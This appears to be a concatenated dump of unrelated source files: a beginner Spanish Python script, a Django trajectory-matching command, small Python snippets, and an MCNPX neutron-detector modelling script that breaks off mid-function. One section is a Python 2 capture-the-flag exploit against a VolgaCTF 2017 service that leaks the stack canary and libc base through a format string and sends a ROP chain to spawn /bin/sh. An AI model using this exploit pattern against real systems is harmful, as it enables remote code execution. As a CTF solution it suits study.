Programa hecho por Mauricio Gibrán Colima Flores
Curso de Introducción a Python
'''
# Import library used to clear the screen
import os
os.system("cls")
# Welcome message
print("\n\n\t\tEste es un programa que calcula tu año de nacimiendo en base en tu edad\n")
print("*Tenga en cuenta que este programa fue creado en 2020, por favor introduzca la edad que cumpla en este año\n\n")
# The user enters their age
edad=input("Ingresa tu edad: ")
# Compute the birth year (hard-coded to the year 2020)
nacimiento=2020-int(edad)  # first type conversion covered in the course
# Show the birth year
print("El año en el que naciste es:"+str(nacimiento))
|
994,934 | ba77165cc5792319d34fd566298df2db6942998e | import socket, struct, os, binascii, base64, hashlib
import telnetlib
# Optional: enable the psyco JIT when available (Python 2 only)
try:
    import psyco; psyco.full()
except ImportError:
    pass
def readline(sc, show = True):
    """Read one LF-terminated line from socket sc; return it without the
    trailing newline, echoing it when show is True.

    Raises Exception if the server disconnects mid-line.
    """
    res = ""
    while len(res) == 0 or res[-1] != "\n":
        data = sc.recv(1)   # one byte at a time: simple, not fast
        if len(data) == 0:
            print repr(res)
            raise Exception("Server disconnected")
        res += data
    if show:
        print repr(res[:-1])
    return res[:-1]
def read_until(sc, s):
    """Read from socket sc until the buffer ends with delimiter s; return
    the data with the delimiter stripped. Raises on disconnect."""
    res = ""
    while not res.endswith(s):
        data = sc.recv(1)
        if len(data) == 0:
            print repr(res)
            raise Exception("Server disconnected")
        res += data
    return res[:-(len(s))]
def read_all(sc, n):
    """Read exactly n bytes from socket sc, looping over short recvs.
    Raises on disconnect before n bytes arrive."""
    data = ""
    while len(data) < n:
        block = sc.recv(n - len(data))
        if len(block) == 0:
            print repr(data)
            raise Exception("Server disconnected")
        data += block
    return data
def I(n):
    """Pack n as a little-endian 32-bit unsigned integer."""
    return struct.Struct("<I").pack(n)
def Q(n):
    """Pack n as a little-endian 64-bit unsigned integer."""
    return struct.Struct("<Q").pack(n)
def find_sol(src):
    """Brute-force a 5-char alphanumeric suffix so that SHA1(src + suffix)
    ends in 26 set bits: hex tail 'ffffff' (24 bits) preceded by a digit
    whose two low bits are set, i.e. one of 3/7/b/f.

    Exits the process if no solution is found in the search space.
    """
    for a in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for b in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
            for c in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
                for d in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
                    for e in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
                        cand = src+a+b+c+d+e
                        t = hashlib.sha1(cand).hexdigest()
                        # ("37bf") is just the string "37bf": this is a
                        # per-character membership test on the 7th-last digit
                        if t.endswith("ffffff") and t[-7] in ("37bf"):
                            print "found", cand, t
                            return cand
    print "NO SOL FOUND"
    exit()
def solvechall(sc):
    # Solve the server's proof-of-work puzzle:
    # find an x such that 26 last bits of SHA1(x) are set, len(x)==29 and x[:24]=='e7f0de3f783bd45adcef43ed'
    res = readline(sc)
    # extract the 24-char fixed prefix the server embeds in its prompt
    src = res.split("x[:24]=='")[1].split("'")[0]
    print src
    sc.send(find_sol(src) + "\n")
sc = socket.create_connection(("time-is.quals.2017.volgactf.ru", 45678))
solvechall(sc)

# offsets into the remote target's libc binary
offset_libc_return = 0x0000000000020830
offset_binsh = 0x000000000018C177
offset_system = 0x0000000000045390

# local test target (kept for reference):
# sc = socket.create_connection(("10.0.0.97", 12345))
# offset_libc_return = 0x0000000000021B45
# offset_binsh = 0x0000000000163708
# offset_system = 0x0000000000041490

readline(sc, False)
# format-string leak: dump stack words to recover the stack canary and a
# libc return address, from which the libc load base is derived
sc.send("%d" * 267 + "|%p" * 64 + "\n")
res = readline(sc, False)
res = res.split("|")
canary = int(res[1][2:], 16)
addr_libc_return = int(res[9][2:], 16)
addr_libc_base = addr_libc_return - offset_libc_return
print hex(canary), hex(addr_libc_base)

# alternative arbitrary-read leak of GOT entries (kept for reference):
# readline(sc, False)
# sc.send("%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p|%s|%s|xxx" + Q(0x0000000000603048) + Q(0x0000000000603058) + "\n")
# res = readline(sc)
# res = res.split("|")
# addr_libc_time = struct.unpack("<Q", res[1].ljust(8, "\x00"))[0]
# addr_libc_gmtime = struct.unpack("<Q", res[2].ljust(8, "\x00"))[0]
# print hex(addr_libc_time), hex(addr_libc_gmtime)

rop_poprdi_retn = 0x0000000000400BA3
# stack smash: 0x808 bytes of padding, the leaked canary, filler for the
# saved registers, then pop rdi; ret -> system("/bin/sh")
rop = "X" * 0x808 + Q(canary) + "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGG" + Q(rop_poprdi_retn) + Q(addr_libc_base + offset_binsh) + Q(addr_libc_base + offset_system)
readline(sc, False)
sc.send(rop + "\n")
readline(sc, False)
sc.send("q\n")   # trigger the overflowed return

# hand the spawned shell over to an interactive telnet session
t = telnetlib.Telnet()
t.sock = sc
t.interact()

# fallback: dump any remaining server output
while True:
    data = sc.recv(16384)
    if len(data) == 0:
        break
    for line in data.split("\n"):
        print repr(line)
|
994,935 | 792cbb25d43c81e79869ff302b94d4332c673815 | from django.core.management.base import BaseCommand, CommandError
from crazyflie.models import SolvedTrajectory
import decimal
import random
import math
import time
class Command(BaseCommand):
    help = 'Starts a process to sync the solved trajectories to the database'

    # bounds used when generating random pitch/roll pairs for benchmarking
    MIN_BENCHMARK_PITCH = 0
    MAX_BENCHMARK_PITCH = 1
    MIN_BENCHMARK_ROLL = 0
    MAX_BENCHMARK_ROLL = 1
    # default "good enough" tolerance for the fast-path query
    IDEAL_DIFFERENTIAL = decimal.Decimal(.01)

    def add_arguments(self, parser):
        """
        Accept the pitch and roll from the command line
        """
        parser.add_argument(
            '--pitch',
            type=decimal.Decimal)
        parser.add_argument(
            '--roll',
            type=decimal.Decimal)
        parser.add_argument(
            '--min_roll_differential',
            default=decimal.Decimal(.1),
            type=decimal.Decimal)
        parser.add_argument(
            '--ideal_min_roll_differential',
            default=decimal.Decimal(.01),
            type=decimal.Decimal)
        parser.add_argument(
            '--min_pitch_differential',
            default=decimal.Decimal(.1),
            type=decimal.Decimal)
        parser.add_argument(
            '--ideal_min_pitch_differential',
            default=decimal.Decimal(.01),
            type=decimal.Decimal)
        parser.add_argument(
            '--benchmark',
            action="store_true",
            default=False)
        parser.add_argument(
            '--benchmark_iterations',
            default=1000,
            type=int)

    @classmethod
    def get_match_score(cls, trajectory, pitch, roll):
        """
        Takes in a trajectory and returns how close it
        is to the inputted pitch and roll
        """
        # squared Euclidean distance in (pitch, roll) space; lower is better
        pitch_differential = abs(trajectory.pitch - pitch)
        roll_differential = abs(trajectory.roll - roll)
        return pow(pitch_differential, 2) + pow(roll_differential, 2)

    @classmethod
    def find_closest_trajectory(cls, **kwargs):
        """
        Finds the file name associated with the
        closest trajectory
        """
        # if we can find an approximation that works to two
        # decimal places, just return that
        ideal_min_pitch = kwargs["pitch"] - \
            kwargs.get("ideal_min_pitch_differential", cls.IDEAL_DIFFERENTIAL)
        ideal_max_pitch = kwargs["pitch"] + \
            kwargs.get("ideal_min_pitch_differential", cls.IDEAL_DIFFERENTIAL)
        ideal_min_roll = kwargs["roll"] - \
            kwargs.get("ideal_min_roll_differential", cls.IDEAL_DIFFERENTIAL)
        ideal_max_roll = kwargs["roll"] + \
            kwargs.get("ideal_min_roll_differential", cls.IDEAL_DIFFERENTIAL)
        # find trajectories that we are good with even if they aren't the absolute
        # best
        ideal_trajectory = SolvedTrajectory.objects.filter(
            pitch__gt=ideal_min_pitch,
            roll__gt=ideal_min_roll
        ).filter(
            pitch__lt=ideal_max_pitch,
            roll__lt=ideal_max_roll)
        ideal_trajectory = ideal_trajectory.first()
        # if we found something in the ideal trajectory, just return that!
        if ideal_trajectory:
            best_trajectory = ideal_trajectory
            best_match_score = cls.get_match_score(
                best_trajectory, kwargs["pitch"], kwargs["roll"])
        # otherwise, we expand our filter and include more results
        else:
            # determine bounds on the pitch and the roll
            # of the trajectory we will return
            min_pitch = kwargs["pitch"] - kwargs["min_pitch_differential"]
            max_pitch = kwargs["pitch"] + kwargs["min_pitch_differential"]
            min_roll = kwargs["roll"] - kwargs["min_roll_differential"]
            max_roll = kwargs["roll"] + kwargs["min_roll_differential"]
            # determine the candidate trajectories
            candidate_trajectories = SolvedTrajectory.objects.filter(
                pitch__gt=min_pitch,
                roll__gt=min_roll
            ).filter(
                pitch__lt=max_pitch,
                roll__lt=max_roll
            )
            # determine the best match from what we have available
            best_trajectory = None
            best_match_score = float("inf")
            for trajectory in candidate_trajectories:
                match_score = cls.get_match_score(
                    trajectory, kwargs["pitch"], kwargs["roll"])
                if match_score < best_match_score:
                    best_trajectory = trajectory
                    best_match_score = match_score
        # NOTE(review): if no candidate fell inside the widened window,
        # best_trajectory stays None and the attribute access below raises —
        # confirm callers guarantee at least one match.
        # calculate the norm of the deviation
        deviation = math.sqrt(best_match_score)
        return best_trajectory.file_name, deviation

    def benchmark(self, **kwargs):
        """
        Benchmarks the speed of the result
        """
        num_iterations = kwargs.get("benchmark_iterations")
        start_time = time.time()
        # store how far off we are
        deviations = []
        for _ in xrange(num_iterations):
            # random pitch/roll inside the benchmark bounds
            kwargs["roll"] = decimal.Decimal(random.uniform(
                self.MIN_BENCHMARK_ROLL, self.MAX_BENCHMARK_ROLL))
            kwargs["pitch"] = decimal.Decimal(random.uniform(
                self.MIN_BENCHMARK_PITCH, self.MAX_BENCHMARK_PITCH))
            _, deviation = self.find_closest_trajectory(**kwargs)
            deviations.append(deviation)
        # calculate results from the benchmarking
        total_time = time.time() - start_time
        average_time = total_time / num_iterations
        average_deviation = sum(deviations) / len(deviations)
        print "AVERAGE TIME: %s AVERAGE DEVIATION: %s" \
            % (average_time, average_deviation)

    def handle(self, *args, **options):
        """
        Exposes a script to find the closest trajectory
        """
        # used to test the speed of determining the closest
        # trajectory
        if options["benchmark"]:
            self.benchmark(**options)
        # finds the closest trajectory
        else:
            file_name, _ = self.find_closest_trajectory(**options)
            return "solved_trajectories/" + file_name
|
994,936 | 2fc3713a2e9f9c2896ae07177433d17c573346fe | from .views import ChatListAPIView
from django.urls import path
# Application namespace -- lets callers reverse URLs as 'api:list'.
app_name = 'api'

urlpatterns = [
    # /chat/list/ -> ChatListAPIView (chat-list endpoint).
    path('chat/list/',ChatListAPIView.as_view(),name='list')
]
|
def firstten():
    """Yield the integers 1 through 10, one at a time."""
    for value in range(1, 11):
        yield value
# Drive the generator and print each yielded value on its own line.
for value in firstten():
    print(value)
|
994,938 | 079e5c3fd57c1cc159034c3e84174824617c42f3 | #!/usr/bin/env python
"""
MCNPX Model for Cylindrical RPM8
"""
import sys
sys.path.append('../MCNPTools/')
sys.path.append('../')
from MCNPMaterial import Materials
import subprocess
import math
import mctal
import numpy as np
import itertools
import os
class CylinderRPM(object):
    """
    MCNPX model of a multi-layer wrapped-cylinder detector inside the RPM8
    enclosure: builds the input deck (cells, surfaces, tallies, materials),
    submits the job to Torque/Maui, and reads tallies back from the mctal
    output.
    """
    # Card format templates: generic cell, cylindrical (cz) surface, and
    # coordinate transform.
    cellForStr = '{:5d} {:d} -{:4.3f} {:d} -{:d} u={:d}\n'
    surfForStr = '{:5d} cz {:5.3f}\n'
    tranForStr = '*tr{:d} {:4.3f} {:4.3f} 0.000\n'
    # Geometry constants (cm).
    geoParam={'RPM8Size':12.7,'DetectorThickness':0.01,'DetectorSpacing':0.8,
            'CylinderLightGuideRadius':0.5,'CylinderRadius':2.5}
    def __init__(self,inp='INP.mcnp'):
        """ Wrapped Cylinder MCNPX Model of RPM8
            Keywords:
            inp -- desired name of the input deck
        """
        # Material dictionary for the moderator, light guide, and detector
        self.material = {'Moderator':None,'Detector':None,'LightGuide':None}
        self.material['Detector'] = {'name':'Detector','mt': 3, 'rho': 1.1,'matString':None} # detector
        self.material['LightGuide'] = {'name': 'PMMA','mt':10, 'rho':0.93} # PMMA
        self.material['Moderator'] = {'name':'HDPE','mt':456, 'rho': 0.93} # HDPE
        # Cell and Surface Inital Numbering
        self.CellStartNum = 600
        self.SurfaceStartNum = 600
        self.ZeroSurfaceNum = 500
        self.UniverseNum = 200
        self.surfGeo = None
        self.inp = inp
        # BUG FIX: the original used self.inp.strip('.mcnp'); str.strip()
        # removes any of the characters '.', 'm', 'c', 'n', 'p' from BOTH
        # ends (e.g. 'pump.mcnp' -> 'u'), not the '.mcnp' suffix.
        self.name = 'OUT_' + self._basename(self.inp) + '.'
        self.setMaterial(0.1,'PS')
    @staticmethod
    def _basename(inp):
        """Return *inp* with a trailing '.mcnp' extension removed."""
        return inp[:-len('.mcnp')] if inp.endswith('.mcnp') else inp
    def __str__(self):
        s = '\tMCNPX Model of Wrapped Cylinder\n'
        s += '\t Cell Number Starts: {0:d}\n'.format(self.CellStartNum)
        s += '\t Surface Number Starts: {0:d}\n'.format(self.SurfaceStartNum)
        return s
    def getInteractionRate(self):
        """ Returns the interaction rate (total, error) of tally 4 from the
        model's mctal output file. """
        m = mctal.MCTAL(self.name+'.m')
        t = m.tallies[4]
        # Returing the total
        return t.data[-1],t.errors[-1]
    def setMaterial(self,massFraction,polymer):
        """
        Sets the detector material to a LiF-loaded polymer.

        Keywords:
            massFraction -- LiF mass fraction of the film
            polymer -- 'PS' or 'PEN'
        Raises ValueError for an unknown polymer.
        """
        M = Materials()
        num = self.material['Detector']['mt']
        if polymer == 'PS':
            self.material['Detector']['matString'] = M.GetPSLiF(massFraction,num)
        elif polymer == 'PEN':
            self.material['Detector']['matString'] = M.GetPENLiF(massFraction,num)
        else:
            raise ValueError('Polymer {} is not in the material database'.format(polymer))
    def createSurfaceGeo(self):
        """
        Creates a dictionary of surface positions and cylinders.

        Keys are radii (cm), values are 'LightGuide' or 'Detector';
        alternating thin detector films and light-guide gaps out to
        the cylinder radius.
        """
        self.surfGeo = dict()
        r = self.geoParam['CylinderLightGuideRadius']
        self.surfGeo[r] = 'LightGuide'
        while(r + self.geoParam['DetectorThickness'] < self.geoParam['CylinderRadius']):
            r += self.geoParam['DetectorThickness']
            self.surfGeo[r] = 'Detector'
            r += self.geoParam['DetectorSpacing']
            if (r < self.geoParam['CylinderRadius']):
                self.surfGeo[r] = 'LightGuide'
        return self.surfGeo
    def calculateDetectorArea(self):
        """
        Calculates the total cross-sectional area (cm^2) of the detector
        films: the sum of the annuli between consecutive film radii.
        """
        area = 0.0
        r = self.geoParam['CylinderLightGuideRadius']
        while(r + self.geoParam['DetectorThickness'] < self.geoParam['CylinderRadius']):
            area -= math.pow(r,2)
            r += self.geoParam['DetectorThickness']
            area += math.pow(r,2)
            r += self.geoParam['DetectorSpacing']
        return math.pi*area
    def createDetectorCylinder(self,uNum=1):
        """
        Creates a detector cylinder
        Returns an ntuple of s,c,detectorCells,cellsCreated
            s - the surface string
            c - the cell string
            detectorCells - a list of the numbers corresponding to the detectors cells
            cellsCreated - total number of cells written
        """
        cellsCreated = 0
        sNum = self.SurfaceStartNum
        cNum = self.CellStartNum
        detectorCells = list()
        s = '{:5d} rcc 0 0 0 0 0 217.7 {}\n'.format(self.SurfaceStartNum,self.geoParam['CylinderRadius'])
        c = ''
        keyList = sorted(self.surfGeo.keys(), key = lambda x: float(x))
        for key in keyList:
            sPrev = sNum
            sNum += 1
            cNum += 1
            s += self.surfForStr.format(sNum,key)
            m = self.material[self.surfGeo[key]]
            if cNum == self.CellStartNum+1:
                # Innermost cell has no inner bounding surface.
                c+= '{:5d} {:d} -{:4.3f} -{:d} u={:d}\n'.format(cNum,m['mt'],m['rho'],sNum,uNum)
            else:
                c += self.cellForStr.format(cNum,m['mt'],m['rho'],sPrev,sNum,uNum)
            # List of cells for the detector
            # BUG FIX: the original compared with "is 'Detector'", i.e.
            # object identity against a string literal, which only worked
            # by CPython interning; use equality.
            if self.surfGeo[key] == 'Detector':
                detectorCells.append(cNum)
            cellsCreated += 1
        # Last cell up to universe boundary
        m = self.material['Moderator']
        c += '{:5d} {:d} -{:4.3f} {:d} u={:d}\n'.format(cNum+1,m['mt'],m['rho'],sNum,uNum)
        cellsCreated += 1
        return s,c,detectorCells,cellsCreated
    def runModel(self):
        """
        Runs the Model by submission to Tourqe / Maui
        """
        qsub= subprocess.check_output('which qsub',shell=True).strip()
        cmd = '#!/bin/bash\n'
        cmd += '#PBS -N {0}\n#PBS -V\n#PBS -q gen1\n#PBS -l nodes=1:ppn=1\n'
        cmd += 'cd $PBS_O_WORKDIR\nmpirun mcnpx inp={1} name={2}\n'
        job = cmd.format('Job_RPMCylinder',self.inp,self.name)
        with open('qsub','w') as o:
            o.write(job)
        subprocess.call(qsub+' qsub',shell=True)
        subprocess.call('rm qsub',shell=True)
    def createInputDeck(self,cylinderPositions,inp=None,name=None):
        """ createInputDeck

        Creates an input deck of the given geometry, placing one filled
        detector-cylinder universe at every (x, y) in cylinderPositions.

        Keywords:
            cylinderPositions -- iterable of (x, y) positions (cm)
            inp -- input deck file name (default 'INP_Cylinder.mcnp')
            name -- MCNPX output name prefix (default 'OUT_Cylinder.')
        """
        self.inp = inp
        self.name = name
        if not inp:
            self.inp = 'INP_Cylinder.mcnp'
        if not name:
            self.name = 'OUT_Cylinder.'
        oFile = self.inp
        # Problem Constants
        cellString = 'c ------------------------- Source ----------------------------------------\n'
        cellString += '70 5 -15.1 -70 $ 252Cf source \n'
        cellString += '71 406 -11.34 -71 70 $ Lead around source\n'
        cellString += '72 456 -0.93 -72 71 $ Poly around source\n'
        surfString = 'c ########################### Surface Cards ##############################\n'
        surfString += 'c ------------------- Encasing Bounds (Size of RPM8) ---------------------\n'
        surfString += '500 rpp 0 12.7 -15.25 15.25 0 217.7 \n'
        # Add in other cells here
        numCells = 4 # 3 Source, 1 RPM8 Encasing
        ##################################################################
        #             Add in Detector Cells and Surfaces                 #
        ##################################################################
        universeNum = 1
        (s,c,detectorCells,cellsCreated) = self.createDetectorCylinder(universeNum)
        surfString += s
        cellString += 'c ------------------- Detector Cylinder Universe ------------------------\n'
        cellString += c
        transNum = 1
        uCellNum = self.UniverseNum
        transString = ''
        cellString += 'c ----------------------- Detector Universe ----------------------------\n'
        for pos in cylinderPositions:
            # One transform + one filled cell per cylinder position.
            transString += self.tranForStr.format(transNum,pos[0],pos[1])
            cellString += '{:5d} 0 -{:d} trcl={:d} fill={:d}\n'.format(uCellNum,self.SurfaceStartNum,transNum,universeNum)
            transNum +=1
            uCellNum +=1
        # Adding the PMMA Moderator Block
        m = self.material['Moderator']
        cellString += 'c ------------------------- HDPE Moderator -----------------------------\n'
        cellString += '{:5d} {:d} -{:4.3f} -{:d} '.format(500,m['mt'],m['rho'],self.ZeroSurfaceNum)
        cellString += ''.join('#{:d} '.format(i) for i in range(self.UniverseNum,uCellNum))
        cellString += '\n'
        # Getting total number of cells
        numCells += cellsCreated + uCellNum-self.UniverseNum +1
        ##################################################################
        #                     Write the Tallies                          #
        ##################################################################
        univCells = range(self.UniverseNum,uCellNum)
        tallyString = 'c ------------------------- Tallies Yo! -----------------------------------\n'
        tallies = {'F54:n':{'cells':detectorCells,'comments':'FC54 6Li Reaction Rates\n',
                    'options':' T\nSD54 1 {0:d}R\nFM54 -1 3 105'}}
        for t in tallies:
            # Getting a list of cells
            tallyString += tallies[t]['comments']
            tallyString += str(t)+' '
            j = 0
            for u in univCells:
                # Cell references are written as (cell < universe), wrapped
                # six to a line.
                cell = list('('+str(c)+'<'+str(u)+') ' for c in tallies[t]['cells'])
                cell = [cell[i:i+6] for i in range(0,len(cell),6)]
                if j > 0:
                    tallyString += '        '+''.join(''.join(i)+'\n' for i in cell)
                else:
                    tallyString += '      '.join(''.join(i)+'\n' for i in cell)
                j +=1
            tallyString = tallyString.rstrip()
            tallyString += tallies[t]['options'].format(len(univCells)*len(tallies[t]['cells']))
            tallyString+='\n'
        # Finish up the problem data
        cellString += 'c ---------------------- Detector Encasing ------------------------------\n'
        cellString += '700 488 -7.92 701 -700 $ SS-316 Encasing \n'
        cellString += 'c -------------------------- Outside World -------------------------------\n'
        cellString += '1000 204 -0.001225 -1000 700 #70 #71 #72 $ Atmosphere \n'
        cellString += '1001 0 1000 \n'
        surfString += 'c ------------------------ Encasing Material -----------------------------\n'
        surfString += '700 rpp -0.3175 13.018 -15.5675 15.5675 -0.3175 218.018 \n'
        surfString += '701 rpp 0.0 12.7 -15.25 15.25 0.0 217.7 \n'
        surfString += 'c -------------- Source --------------------------------------------------\n'
        surfString += '70 s -200 0 108.85 2.510E-04 $ Source \n'
        surfString += '71 s -200 0 108.85 5.0025E-01 $ 0.5 cm lead surrounding source \n'
        surfString += '72 s -200 0 108.85 3.00025 $ 2.5 cm poly surrounding source \n'
        surfString += 'c -------------- Outside World -------------------------------------------\n'
        surfString += '1000 so 250 \n'
        matString = 'c -------------------------- Material Cards -----------------------------\n'
        matString += self.material['Detector']['matString']
        matString += self.getMaterialString()
        with open(oFile,'w') as o:
            o.write('MCNPX Simulation of RPM8 Cylinder\n')
            o.write(cellString)
            o.write('\n')
            o.write(surfString)
            o.write('\n')
            o.write(self.getRunString().format(numCells))
            o.write(self.getSrcString())
            o.write(tallyString)
            o.write(matString)
            o.write(transString)
            o.write('\n')
    def getRunString(self):
        """Returns the MCNPX run-control card block; '{0}' is filled with
        the number of cells for the IMP card."""
        runString ='c ------------------------------ Run Info ---------------------------------\n'
        runString +='nps 1E6 \n'
        runString +='IMP:N 1 {0:d}R 0 $ Particle Importances within cells \n'
        runString +='c -------------- Output --------------------------------------------------\n'
        runString +='PRDMP j j 1 $ Write a MCTAL File \n'
        runString +='PRINT 40 \n'
        runString +='c ------------------------------ Physics ---------------------------------\n'
        runString +='MODE N \n'
        runString +='PHYS:N 100 4j -1 2 \n'
        runString +='CUT:N 2j 0 0 \n'
        return runString
    def getSrcString(self):
        """
        Returns the MCNPX formated source string
        """
        srcString = 'c -------------------------- Source Defination ----------------------------\n'
        srcString += 'c 1 nanogram Cf-252 source = 1E-9 grams = 6.623E-11 cc \n'
        srcString += 'sdef pos=-200 0 108.85 cel=70 par=SF rad=d1 \n'
        srcString += 'si1 0 2.510E-04 \n'
        srcString += 'sp1 -21 1 \n'
        return srcString
    def getMaterialString(self):
        """
        Returns the MCNXP material string
        """
        matString = 'm10 1001.70c -0.080538 $Lucite (PMMA / Plexiglass) rho = 1.19 g/cc\n'
        matString += '     6012.70c -0.599848 8016.70c -0.319614 \n'
        matString += 'm204 7014.70c -0.755636 $air (US S. Atm at sea level) rho = 0.001225 \n'
        matString += '     8016.70c -0.231475 18036.70c -3.9e-005 18038.70c -8e-006\n'
        matString += '     18040.70c -0.012842 \n'
        matString += 'm5 98252.66c 1 $ Cf-252, rho =15.1 g/cc wiki \n'
        matString += 'm406 82204.70c -0.013781 $Lead, \n'
        matString += '     82206.70c -0.239557 82207.70c -0.220743 82208.70c -0.525919\n'
        matString += 'm456 1001.70c -0.143716 $Polyethylene - rho = 0.93 g/cc \n'
        matString += '     6000.70c -0.856284 \n'
        matString += 'm488 14028.70c -0.009187 $Steel, Stainless 316 rho = 7.92 \n'
        matString += '     14029.70c -0.000482 14030.70c -0.000331 24050.70c -0.007095\n'
        matString += '     24052.70c -0.142291 24053.70c -0.016443 24054.70c -0.004171\n'
        matString += '     25055.70c -0.02 26054.70c -0.037326 26056.70c -0.601748\n'
        matString += '     26057.70c -0.014024 26058.70c -0.001903 28058.70c -0.080873\n'
        matString += '     28060.70c -0.031984 28061.70c -0.001408 28062.70c -0.004546\n'
        matString += '     28064.70c -0.001189 42092.70c -0.003554 42094.70c -0.002264\n'
        matString += '     42095.70c -0.003937 42096.70c -0.004169 42097.70c -0.002412\n'
        matString += '     42098.70c -0.006157 42100.70c -0.002507 \n'
        matString += 'mt3 poly.01t \n'
        matString += 'mt456 poly.01t \n'
        matString += 'mt10 poly.01t \n'
        return matString
def run(loading,polymers):
    """
    Runs a matrix of loading and polymers

    Keywords:
        loading -- iterable of LiF mass fractions
        polymers -- iterable of polymer names ('PS', 'PEN')

    NOTE: the original assigned four alternative layouts in a row; only
    the last (five-cylinder) assignment was ever used, so the dead
    assignments are removed and the active layout kept.
    """
    # Five-cylinder layout: (x, y) positions inside the RPM8 enclosure.
    cylinderPositions = ((4.23,10.16),(4.23,5.08),(4.23,0.0),(4.23,-5.08),(4.23,-10.16))
    for l in loading:
        for p in polymers:
            RunCylinder(l,p,cylinderPositions)
def RunCylinder(l,p,cylinderPositions):
    """
    Runs an mcnpx model of the cylinder of loading l, polymer p, with
    cylinder positions cylinderPositions.
    Keywords:
        l - loading of the films
        p - polymer
        cylinderPositions - the cylinder positons
    (Python 2 module: uses the print statement.)
    """
    # Creating input and output deck names
    # File names encode loading, polymer, and the x coordinate of every
    # cylinder, joined with '-', e.g. Cyl_30LiF_PS_4.2-4.2.mcnp
    posString = ''
    for pos in cylinderPositions:
        posString += '{:2.1f}-'.format(pos[0])
    posString = posString.rstrip('-')
    inp='Cyl_{}LiF_{}_{}.mcnp'.format(int(l*100),p,posString)
    name='OUTCyl_{}LiF_{}_{}.'.format(int(l*100),p,posString)
    print inp
    # Creating and running the model
    m = CylinderRPM()
    m.createSurfaceGeo()
    m.setMaterial(l,p)
    m.createDetectorCylinder()
    m.createInputDeck(cylinderPositions,inp,name)
    m.runModel()
def CreatePositions(yPos,numXPertubations):
    """
    Creates and returns an array of positions, using a set array of y
    positions, with equally spaced number of numXPertubations.
    Keywords:
        yPos - the y positions (spacing of the cylinders).  The number of
            elements in this array corresponds to the number of cylinders
            that are simulated.
        numXPertubations - the number of pertubations in x.  The returned
            positions are spaced linearly in x from 2.54 to 10 cm.
    Returns a list of layouts; each layout is a list of (x, y) tuples.
    """
    pos = list()
    xVals = np.linspace(2.54,10,numXPertubations)
    xPos = list(itertools.product(xVals,repeat=len(yPos)))
    for x in xPos:
        # BUG FIX: materialize with list(zip(...)).  Under Python 3 a bare
        # zip() is a one-shot iterator, so the stored layouts would be
        # silently empty after first use (Python 2 returned a list).
        pos.append(list(zip(x,yPos)))
    return pos
def PositionOptimization(loading,polymers,positions):
    """
    Runs RunCylinder over the full cartesian product of loadings,
    polymers, and candidate cylinder-position layouts.
    """
    for l, p, pos in itertools.product(loading, polymers, positions):
        RunCylinder(l, p, pos)
def createInputPlotDecks():
    """Writes plotting-only input decks for the 2- and 3-cylinder layouts."""
    layouts = [
        ((4.23, 10.16), (4.23, -10.16)),
        ((4.23, 7.625), (4.23, 0), (4.23, -7.625)),
        # ((4.23, 9.15), (4.23, 3.05), (4.23, -3.05), (4.23, -9.15)),
    ]
    for layout in layouts:
        model = CylinderRPM()
        model.createSurfaceGeo()
        model.createDetectorCylinder()
        count = len(layout)
        model.createInputDeck(layout,
                              'Cylinder_{}.mcnp'.format(count),
                              'OUTCylinder_{}.'.format(count))
def computeMassLi(polymer,loading,density=1.1):
    """
    Computes the mass of Li for a given polymer and loading.

    Keywords:
        polymer -- polymer name ('PS' or 'PEN')
        loading -- LiF mass fraction
        density -- film density in g/cc (default 1.1)
    """
    materials = Materials()
    model = CylinderRPM()
    detector_area = model.calculateDetectorArea()
    # 217.0 is the detector length factor used here.
    # NOTE(review): the surface cards use 217.7 cm for the cylinder
    # height -- confirm which value is intended.
    return detector_area * 217.0 * materials.GetLiMassFraction(loading, polymer) * density
def extractRunInfo(filename):
    """
    Extracts the loading and polymer from a file name such as
    'OUTCyl_30LiF_PS.m'.

    Returns (loading_fraction, polymer), e.g. (0.3, 'PS').
    """
    parts = filename.split('_')
    percent = parts[1].strip('LiF')   # drops the characters L/i/F from the ends
    polymer = parts[2].strip('.m')    # drops the characters '.'/'m' from the ends
    return (float(percent) / 100, polymer)
###########################################################################
# #
# Summerizes / Analysis #
# #
###########################################################################
def GetInteractionRate(f,tallyNum=54,src=2.3E3):
    """
    Returns (rate, absolute_error) for the requested tally of an mctal
    file, scaled by the source strength *src*.
    """
    tally = mctal.MCTAL(f).tallies[tallyNum]
    rate = tally.data[-1] * src
    error = tally.errors[-1] * tally.data[-1] * src
    return (rate, error)
import glob
def summerize():
    """
    Prints a CSV-style summary -- polymer, loading, Li mass, count rate,
    error, and count rate per unit Li mass -- for every OUTCylinder*.m
    mctal file in the current directory.  (Python 2: print statement.)
    """
    files = glob.glob('OUTCylinder*.m')
    s = 'Polymer, loading, mass Li, count rate, error, count rate per mass\n'
    for f in files:
        runParam = extractRunInfo(f)
        massLi = computeMassLi(runParam[1],runParam[0])
        countRate = GetInteractionRate(f)
        s += '{}, {:5.2f} , {:5.3f} , {:5.3f} , {:4.2f} , {:5.3f}\n'.format(runParam[1].ljust(7),runParam[0],massLi,countRate[0],countRate[1],countRate[0]/massLi)
    print s
def OptimizationSummary(path):
    """
    Summerizes the Optimization Output

    Prints the nine highest and five lowest interaction rates among the
    .m files found directly under *path*.  Raises IOError if *path* is
    not a directory.  (Python 2: print statements.)
    """
    # Getting the files
    if not os.path.isdir(path):
        raise IOError('Path {} is not found'.format(path))
    files = glob.glob(path+'/*.m')
    if not files:
        print 'No files matched the pattern'
        return
    # Parsing the files
    data = dict()
    for f in files:
        # Key each result by the file's base name without extension.
        name = os.path.splitext(os.path.split(f)[1])[0]
        data[name] = GetInteractionRate(f)
    # Max value
    # Sorts by the (rate, error) tuple, highest rate first.
    sortedKeys = sorted(data, key=data.get,reverse=True)
    #sortedKeys = sorted(data.items(), key=lambda x : float(x[1][0]),reverse=True)
    for key in sortedKeys[0:9]:
        print '{} -> {:5.2f} +/- {:5.2f}'.format(key,data[key][0],data[key][1])
    for key in sortedKeys[-6:-1]:
